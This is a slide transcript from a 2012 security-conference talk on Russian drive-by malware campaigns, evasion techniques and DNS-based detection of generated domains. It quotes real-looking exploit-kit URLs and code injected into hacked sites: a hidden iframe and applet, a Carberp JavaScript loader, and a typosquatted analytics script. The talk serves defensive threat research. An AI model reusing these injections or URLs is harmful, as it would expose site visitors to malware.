Hacklu2012 v07
description
Transcript of Hacklu2012 v07
![Page 1: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/1.jpg)
![Page 2: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/2.jpg)
CyberCrime 2012As we know it -
Trends, Monitoring,
Real Time Detection
@fygrave@vbkropotov
Presented at hack.lu 2012
![Page 3: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/3.jpg)
3
agenda
CyberCrime 2012: trendsMalicious campaigns in 2012 (case studies)Evolving evasion techniquesAutomating Detection real-timeConclusions
![Page 4: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/4.jpg)
4
About speakers
● We are from Russia.. kind of ;)
![Page 5: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/5.jpg)
5
Cybercrime 2012trends
![Page 6: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/6.jpg)
6
Emerging attack vectors
● DbD – old. Still popular– High profile targets are getting compromised
● Email campaigns – getting bigger, mass mailings to users from compromised targets
● Social Engineering attacks ● Mobile plays active role
![Page 7: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/7.jpg)
7
Malicious Campaigns Sept 2011-Oct 2012
Case studies
![Page 8: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/8.jpg)
8
Autumn 2011kp.ru National-wide newspaper?
● ~550 000 visitors per day● Drive-By..
![Page 9: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/9.jpg)
9
![Page 10: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/10.jpg)
10
Autumn 2011rzd.ru National Railroads?
● ~200 000 visitors per day
● “Gimme a Malware!!”
![Page 11: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/11.jpg)
11
Yepp, rzd-rzd.ru as an intermediate
![Page 12: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/12.jpg)
12
![Page 13: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/13.jpg)
13
Just TWO Domains, SURE?Domain URLinterfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root
rzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root
news-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root
rzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
therzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.inhttp://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root
rzd-rzdcomp.inhttp://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1
press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root
pass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
![Page 14: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/14.jpg)
14
Campaign
![Page 15: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/15.jpg)
15
italia-new.inbaner-klerk.ru bank-klerk.ru
banner-klerk.ru blogs-klerk.ru buh-klerk.ru daily-kp.ru eg-obzor.ru
forum-klerk.ru i-obozrevatel.ru interfax-region.ru
ipgeobase.in
job-klerk.ru klerk-bank.ru klerk-bankir.ruklerk-biz.ru
klerk-boss.ru klerk-buh.ru
klerk-even.ru klerk-events.ru klerk-forum.ruklerk-law.ru klerk-new.ru klerk-news.ru
klerk-reklama.ru klerk-ru.ru
klerk-work.ru klerk2.ru
obozrevatel-ru.ru obozrevatelru.ru
kp-daily.rukp-kp.in
minsk-kp.inperm-kp.inwiki-klerk.ru
Similar style detected domains
![Page 16: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/16.jpg)
16
Klerk.ru
● Finance related portal ● ~150 000 visitors per day
![Page 17: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/17.jpg)
17
“fileless” bot Campaign 2011 – Oct 2012
● Version 1 (detected) Nov 2011● Version 2 (detected) Feb-Mar 2012● Version 3 (detected) May 2012● Version 4 (detected) First seen in Aug 2012
Last detect in Oct 2012 (distributed via infected banner networks too)
![Page 18: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/18.jpg)
18
glavbukh.ru (Chief Accountant)~45 000 targeted visitors per day
Date detected
IP Domain Url Domain created
Referrer
09/Nov/2011 176.9.50.178 jya56yhsvcsss.com /BVRQ 08/Nov/2011 glavbukh.ru
11/Nov/2011 176.9.50.178 ha526ugfsfh.com /BVRQ 11/Nov/2011 glavbukh.ru
06/Feb/2012 66.199.232.98 zcxrwuj4b.eu /GLMF 26/Jan/2012 glavbukh.ru
13/Feb/2012 66.199.232.9 zaurona.eu /GLMF 08/Feb/2012 glavbukh.ru
20/Apr/2012 64.20.35.194 vuyrtyal.info /RK85 04/Apr/2012 glavbukh.ru
03/May/2012 64.20.35.194 hortezam.info /RK85 24/Apr/2012 glavbukh.ru
![Page 19: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/19.jpg)
19
glavbukh.ru, tks.ru, etc. May 2012
:arg hl=us&source=hp&q=-1785331712&aq=f&aqi=&aql=&oq=
:field Adobe Flash Player 11 ActiveX|1.Conexant 20585 SmartAudio HD|3.ThinkPad Modem Adapter|7.Security Update for Windows XP (KB2079403)|1.Security Update for Windows XP (KB2115168)|1.Security Update for Windows XP (KB2229593)|1.Security Update for Windows
![Page 20: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/20.jpg)
20
Drive-by newsru.com ver. Sept 2012
Domains on Sep 11 2012
![Page 21: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/21.jpg)
21
Permanent fails, fileles bot Campaign 2011 – Oct 2012
● Finance related portal ● ~130 000 visitors per day
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;">
<applet archive="/07GICjq" code="Applet.class">
Sep 17 2012 echo.msk.ru ~440 000 visitors per day
![Page 22: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/22.jpg)
22
Permanent fails, fileles bot Campaign 2011 – Oct 2012
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;"><applet archive="/07GICjq" code="Applet.class">
Sep 17 2012 Banner network adfox.ru affected
![Page 23: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/23.jpg)
23
Campaign participants examplesDomain Resource type When seen unique hosts
per day
Vesti.ru TV news Autumn 2012 ~ 930 000
gazeta.ru news Winter 2012-Autumn 2012 ~490 000
newsru.com news Spring 2012 - Autumn 2012 ~470 000
echo.msk.ru radio Autumn 2012 ~440 000
3DNews.ru news Summer 2012 – Autumn 2012 ~180 000
inosmi.ru news Autumn 2011 – Summer 2012 115 000
glavbukh.ru Accountants Winter 2012-Spring 2012 ~45 000
tks.ru Finance (Import/Explort)
Winter 2012-Autumn 2012 ~23 000
![Page 24: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/24.jpg)
24
Mobile scam
http://codbanners.ru
![Page 25: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/25.jpg)
25
Mobile scams
● Fake apps are still big● Android apps avail :)
![Page 26: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/26.jpg)
26
![Page 27: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/27.jpg)
27
• Legal • Faked
Another news,another
phone…
![Page 28: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/28.jpg)
28
![Page 29: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/29.jpg)
29
Evolution of Counter-Detection andEvasion Techniques
![Page 30: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/30.jpg)
31
Malware hostings location interesting examples
Countries, hosters and slide with VPN “#epicfail” in configuration.
Sample in gov.ua and Ogni Moskvu bank
![Page 31: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/31.jpg)
32
Drive By from Bank IP rangeDate/Time 2011-11-25 15:45:27 MSKTag Name Java_Possibly_Malicious_Applet
server 1541897761 URL /dfbgeskdfa/Gmail.class
Packet DestinationAddress 10.X.X.X Packet DestinationPort 42642 Packet SourceAddress 91.231.126.33 Packet SourcePort 80 Packet
netnum: 91.231.126.0 - 91.231.126.255netname: ognmorganisation: ORG-LCM2-RIPEorg-name: LTD CB "OGNI MOSKVY"address: 27 st. New Basmannayaaddress: 105066, Moscow,address: Russiae-mail: [email protected] (mailto:[email protected])phone: +7 495 7805181
Gmail.class - Exploit:Java/CVE-2010-0840
![Page 32: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/32.jpg)
33
Drive By from State Land Cadastral Center at the State Agency of Land
Resources of Ukraine RangeDate/Time 2011-11-13 11:34:08 MSKTag Name Java_Possibly_Malicious_Applet
server 1539495587 URL /Gmail.class
Packet DestinationAddress 10.X.X.X Packet DestinationPort 40487Packet SourceAddress 91.194.214.163 Packet SourcePort 80 Packet
netnum: 91.194.214.0 - 91.194.215.255netname: SLCCdescr: State Land Cadastral Center at the State Agency of Land Resources of Ukrainecountry: UAorganisation: ORG-SLCC1-RIPEaddress: 3 Narodnogo Opolchenya street, Kiev, Ukraine
Gmail.class - Exploit:Java/CVE-2010-0840
![Page 33: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/33.jpg)
34
Back end Epic Fail Mar 13 2011 VPN 95.163.66.197 real 91.194.214.71
Exploit pack in UA State agency of land resources IP range still alive
![Page 34: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/34.jpg)
35
Not typical (now typical :-) attacks Examples
- Attacks using stolen/misconfigured DNS accounts
- Attacks that require real-user interaction
- Intermediate hostnames with similar hostnames (to make manual analysis trouble-some?)
- Drive by “FTP” types of attacks
![Page 35: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/35.jpg)
36
Stolen domains example:
Time URL IP24/Jan/2012:18:59:54 GET http://csrv2.fatdiary.org/main.php?page=7a5a09bea4d91836 146.185.242.69
24/Jan/2012:19:00:18 GET http://csrv2.fatdiary.org/content/field.swf HTTP/1.0 146.185.242.69
25/Jan/2012:09:36:31 GET http://csrv15.amurt.org.uk/main.php?page=7a5a09bea4d91836 146.185.242.69
25/Jan/2012:09:36:33 GET http://csrv15.amurt.org.uk/content/fdp2.php?f=17 146.185.242.69
25/Jan/2012:09:36:44 GET http://csrv15.amurt.org.uk/content/field.swf 146.185.242.69
25/Jan/2012:09:36:45 GET http://csrv15.amurt.org.uk/content/v1.jar 146.185.242.69
25/Jan/2012:09:36:48 GET http://csrv15.amurt.org.uk/w.php?f=17%26e=0 146.185.242.69
26/Jan/2012:07:28:05 GET http://csrv23.UIUIopenvrml.org/main.php?page=7a5a09bea4d91836
146.185.242.69
31/Jan/2012:10:27:35 GET http://csrv24.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:10:27:47 GET http://csrv24.air-bagan.org/content/rino.jar 146.185.242.79
31/Jan/2012:18:18:51 GET http://csrv35.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:18:19:03 GET http://csrv35.air-bagan.org/getJavaInfo.jar 146.185.242.79
04/Feb/2012:12:02:51 GET http://csrv29.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
06/Feb/2012:09:08:51 GET http://csrv89.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
![Page 36: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/36.jpg)
37
WHAT'S COMMON
amurt.org.uk 46.227.202.68 Registered on: 15-Oct-1999
Name servers: ns1.afraid.org
air-bagan.org 122.155.190.31 Created On:05-Aug-2006
Name Server:NS1.AFRAID.ORG
fatdiary.org 71.237.151.22 Created On:17-Jul-2006
Name Server:NS1.AFRAID.ORG
prawda2.info 91.192.39.83 Created On:18-Oct-2007
Name Server:NS1.AFRAID.ORG
![Page 37: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/37.jpg)
38
Malware domains reputation and DNS accounts attacks
Starting from August 2012 we detect second wave of this campaign, be careful, examples Sep 2012
alex01.net -> 46.39.237.81 >>> games.alex01.net -> 178.162.132.178
socceradventure.net 72.8.150.14 >>> mobilki.socceradventure.net -> 178.162.132.178
talleresnahuel.com 74.54.202.162 >>> kino.talleresnahuel.com -> 178.162.132.178
qultivator.se 72.8.150.15 >>> 597821.qultivator.se -> 178.162.132.166
![Page 38: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/38.jpg)
39
Carberp campaign Mar – May 2012 with tiny user interaction
function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {
…
![Page 39: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/39.jpg)
40
Hacked Domains from Spring Carberp campaignhoster rel-net.eu 62.122.72.0 - 62.122.79.255
009.ru1.poliklinika72.ru1c-documents.ru232info.rualrf.ruambulatorya.ruarkan.ruaryahome.ruaryatekstil.ruato.ruauto-pik.rubablam.rubadger.rubeauty-breeze.ruberkem.rubestwatch.rubounty72.rubronipoezd.rucar-baby.ruchalet-cpark.rucrocus-hall.ruct.spb.ru
ctc-tv.rudailypixel.rudataplex.rudoctor-istomin.rudraiverton.imho2.rudtr.bydvvs.ruedimvkusno.rueka4.ruexpert-kld.rufamily-fitness.rufastrans.rufflow.rufictionbook.ruflowers-fantasy.rugidrostyle.ruguitarism.ruhmcity.ruhotel-sokol.ruipoteka-tmn.ruizvestia.ru
kb83.comknowingsnibiru.rukolobok80.rukontaktor.rukuhni-mila.rukyokushinkarate.rulaccent.rulenovofans.rulifenews.rumaleton.rumandroid.rumanualbase.rumarianowka.rumarte.rumaxime-and-co.commedin.rumedin.rumenyaraduet.rumexa-n.rumolurist.rumps-energo.runew.turbinist.ru
oilloot.ruorthographia.ruostrov72.rupod-remont.ruregion64.ruremont-
krasnogorsk.rurevital.ruribalkadaohota.rurostteh.rurstmos.rurusso-excursio.frsakuraauto.rusellex.rushop-detect.ruskk-chess.ruskypecashin.ruspdnv.ruspk-up.rusport.optika-8.rustroyoffis.rustud.samgtu.rustyle.aladna.ru
subsidii.nettopsalon.rutouravia.rutushkan.netumade.ruvantatech.ruvash-master-
remont.ruvideoecology.ruvinils.ruvms56.ruvolociki.ruvonny-and-dolan.ruvosesoftware.comwinfield-oil.ruwusley.ruyarglobus.ruzip.ruzooeco.comтурбинист.рф
![Page 40: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/40.jpg)
41
Domains with interesting namesIntermediate domains names often similar to
hacked domain name, or to well known banner network or counter.
Spot the differencies: ●google-analytics.com vs.●google-analylics.com ●google-anatylics.com
![Page 41: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/41.jpg)
42
Trud.ru affected feb 21 2012<script type="text/javascript">
● var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");●
● document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
● </script>● <script type="text/javascript">● var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");●
● document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
● </script>●
● Name: google-analytics.com Addresses: 173.194.32.48●
● Name: www.google-analitycs.com Address: 184.82.149.180●
![Page 42: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/42.jpg)
43
Noproblemslove.com, whoismistergreen.com, etc...
● Bot Infection: Drive-By-HTTP● Payload and intermediate malware
domains:Normal /DynDNS● Distributed via: Compromised web-sites. ● C&C domains: normal.● C&C and Malware domains located on the
different AS. Sophisticated attack scheme. Timeout before activity.
● Typical bot activity: Mass HTTP Post
![Page 43: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/43.jpg)
44
Noproblemslove.com, whoismistergreen.com, etc...
![Page 44: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/44.jpg)
45
Interesting domains from range 184.82.149.178-184.82.149.180 (Feb 2012)
Domain Name IP
www.google-analylics.com 184.82.149.179
google-anatylics.com 184.82.149.178
www.google-analitycs.com 184.82.149.180
webmaster-google.ru 184.82.149.178
paged2.googlesyndlcation.com 184.82.149.179
googlefilter.ru 184.82.149.179
rambler-analytics.ru 184.82.149.179
site-yandex.net 184.82.149.180
paged2.googlesyndlcation.com 184.82.149.179
www.yandex-analytics.ru 184.82.149.178
googles.4pu.com 184.82.149.178
googleapis.www1.biz 184.82.149.178
syn1-adriver.ru 184.82.149.178
![Page 45: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/45.jpg)
46
C&C domainswhoismistergreen.com
IP-адрес: 213.5.68.105
Create: 2011-07-26
Registrant Name: JOHN ABRAHAM
Address: ul. Dubois 119
City: Lodz
noproblemslove.com
213.5.68.105
Created: 2011-12-07
Registrant Contact:
Whois Privacy Protection Service
Whois Agent [email protected]
noproblemsbro.com
176.65.166.28
Created: 2011-12-07
Registrant Contact:
Whois Privacy Protection Service
Whois Agent [email protected]
patr1ckjane.com
IP Was 176.65.166.28
IP Now 213.5.68.105
Create: 2011-07-21
Registrant Name: patrick jane
Address: ul. Dubois 119
City: Lodz
![Page 46: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/46.jpg)
47
Not typical attacks via FTP
First seen 24/10/2011 11:28 ftp://1572572686/Main.class
Sample Mar 07 java version as a password
![Page 47: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/47.jpg)
48
Domain URL Referrer Payload Size
3645455029 /1/s.html Infected site html 997
Java.com /js/deployJava.js 3645455029 javascript 4923
3645455029 /1/exp.jar application/x-jar
18046
3645455029 /file1.dat application/executable
138352
![Page 48: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/48.jpg)
49
Attack analysis- Script from www. Java.com used during attack.
- Applet exp.jar loaded by FTP
- FTP Server IP address obfuscated to avoid detection
![Page 49: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/49.jpg)
50
Not Found?
![Page 50: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/50.jpg)
51
Interesting modificationsGET http://java.com/ru/download
/windows_ie.jsp?host=java.com%26
returnPage=ftp://217.73.58.181/1/s.html%26
locale=ru HTTP/1.1
Key feature exampleDate/Time 2012-04-20 11:11:49 MSD
Tag Name FTP_Pass
Target IP Address 217.73.63.202
Target Object Name 21
:password Java1.6.0_30@:user anonymous
![Page 51: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/51.jpg)
52
Registrar abuse(1)
● gidzzkc.dogbookeoor-amtuzxo.org. A 91.220.84.7● yqvdmbul.dogbookeoor-amtuzxo.org. A 91.220.84.7● fncalzrmx.dogbookeoor-amtuzxo.org. A 91.220.84.7● ghyyaweczb.dogbookeoor-amtuzxo.org. A 91.220.84.7● vrmvneod.catxnahi-yarndfhh.info. A 91.220.84.6● wrxpvxdudahlu.catxnahi-yarndfhh.info. A 91.220.84.6● owcfudqqlgowwn.catxnahi-yarndfhh.info.A 91.220.84.6● rskgwknaz.video-zgn-gqmbcax.info. A 91.220.84.6● ahlcpdmssw.video-zgn-gqmbcax.info. A 91.220.84.6● xrwxozkniqq.video-zgn-gqmbcax.info. A 91.220.84.6● ighirfzcxdrii.video-zgn-gqmbcax.info. A 91.220.84.6
![Page 52: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/52.jpg)
53
Registrar abuse (2)
● mlfskgdbwnfos.baseball-payed-mzigsy-voo.org 91.237.153.16
● onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org 91.237.153.16
● Domains disappear without a trace within 30 minutes after use.
![Page 53: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/53.jpg)
54
Registrar abuse (3)● http://raisport.ru/contacts >>>
xugamabpi.arraysort-qmppbkkn-abkn.org
● http://k62cg56m62.dyndns.info/js/vip.php?s=MSIE&n=8 >>> onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org
● http://iked5gikr.ocry.com/do.php >>> fblcatagg.string-panelpvli-qbo-bmvf.org
![Page 54: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/54.jpg)
55
Legit domains are used ..
11.09.2012
http://out1.sudameris.com.ar/out
qehboobwkqvo.task-games-pta-vywcngn.org
91.237.153.24
![Page 55: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/55.jpg)
56
What could be more flux than fastflux? ;-)
● WHOIS fastflux … HOW?!
Domain ID:D166393631-LRORDomain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORGCreated On:21-Aug-2012 01:23:52 UTCLast Updated On:21-Aug-2012 01:23:53 UTCExpiration Date:21-Aug-2013 01:23:52 UTCSponsoring Registrar:Click Registrar, Inc. d/b/apublicdomainregistry.com (R1935-LROR)Status:CLIENT TRANSFER PROHIBITEDStatus:TRANSFER PROHIBITEDStatus:ADDPERIODRegistrant ID:PP-SP-001Registrant Name:Domain AdminRegistrant Organization:PrivacyProtect.orgRegistrant Street1:ID#10760, PO Box 16Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.orgRegistrant Street3:Registrant City:Nobby BeachRegistrant State/Province:Registrant Postal Code:QLD 4218Registrant Country:AURegistrant Phone:+45.36946676
![Page 56: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/56.jpg)
57
Russian ASN (as5577)
![Page 57: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/57.jpg)
58
Intermediate ev2.ru, SpyEye Campaign
![Page 58: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/58.jpg)
59
Words distribution (len >3) in domain names
![Page 59: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/59.jpg)
60
Incidents vs. timeCIRCL team
informed
![Page 60: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/60.jpg)
61
DEMOTIME: SHOWSOME VIDEOZHERE :)
![Page 61: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/61.jpg)
62
Advanced bots:Social network as C&C
![Page 62: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/62.jpg)
63
Evasion techniques:summary
- Evasion of automated detection of compromised resource (via crawler)- Evasion of automated detection of compromised resource (via sandbox)- Evasion techniques used in exploit serving mechanisms and malicious payloads- Counter-analysis techniques (in infrastructure)
![Page 63: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/63.jpg)
64
Detection 2012
![Page 64: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/64.jpg)
65
Detecting DGA through DNS traffic
Input: DNS packets (passive DNS)Output: list of active domains
List of “could be active” domainsList of “were active” domains
IP addresses used by mal. infrastructure
![Page 65: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/65.jpg)
66
DGA pattern: How it looks on the wire
![Page 66: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/66.jpg)
67
Detecting DGA
● Simplified algorithm:– take domains with failed DNS lookup (rcode: 2, non-
existant domain or rcode:3, domain name server failed)
– Group them by similarity function f(x)
– Find domains with even distribution.– Identify other domains matching the same similarity
criteria f(x)
– Discover relevant IP addresses– Rinse and repeat :)
![Page 67: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/67.jpg)
68
Detection: related works
From Throw-Away Traffic to Bots: Detecting Rise of DGA-Based Malware (Manos Antonakakis, Roberto Redisci et al) (2012)
L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi.
EXPOSURE: Finding malicious domains using
passive dns analysis. In Proceedings of NDSS,
2011
etc..
![Page 68: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/68.jpg)
69
What we do differently:
● “lazy” WHOIS lookups, team cymru IP to ASN lookups
● Our own passive DNS index● Sandbox farm (mainly to detect compromised
websites automagically and study behavior)
![Page 69: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/69.jpg)
70
Architecture
![Page 70: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/70.jpg)
71
Sample analysis (step by step)
● Start looking for a failed pattern and cluster id:
![Page 71: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/71.jpg)
72
Sample analysis (two)
● Get the cluster ID: (eu_11_14)
Clustering is based on domain similarity. Currently used characteristics: - f(zone, pattern (length, depth)) - additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences - n-grams)- domain registration parameters (obtained via WHOIS [ problematic! ] )- cross-reference with existing malicious IP and AS reputation database (incrementally built by us)
![Page 72: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/72.jpg)
73
Sample analysis
● Get other members of the cluster
